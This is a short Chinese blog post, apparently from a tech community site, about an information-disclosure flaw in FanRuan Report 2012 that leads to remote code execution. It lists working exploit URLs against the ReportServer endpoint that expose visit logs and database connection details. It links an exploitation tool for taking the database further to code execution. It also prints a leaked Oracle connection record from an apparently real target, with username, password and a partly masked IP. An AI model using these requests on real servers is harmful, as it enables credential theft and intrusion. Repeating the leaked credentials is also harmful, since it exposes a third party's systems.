0
点赞
收藏
分享

微信扫一扫

帆软报表 2012 信息泄露漏洞导致RCE

其生 2022-04-25 阅读 102
安全

漏洞描述

漏洞影响

空间测绘

漏洞复现

  • 访问ip日志EXP
http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false

  • ✅ 数据库信息泄露
http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_getconnectioninfo

  • ✅ 数据库利用工具RCE
https://github.com/safe6Sec/PentestDB

数据库信息:
{"connection":[{"name":"sdykdx","driver":"oracle.jdbc.driver.OracleDriver","password":"sdykdx","user":"sdykdx","url":"jdbc:oracle:thin:@202.204.xxx.117:1521:orcl"}],"fr_platform_version":1650895353052}

举报

相关推荐

0 条评论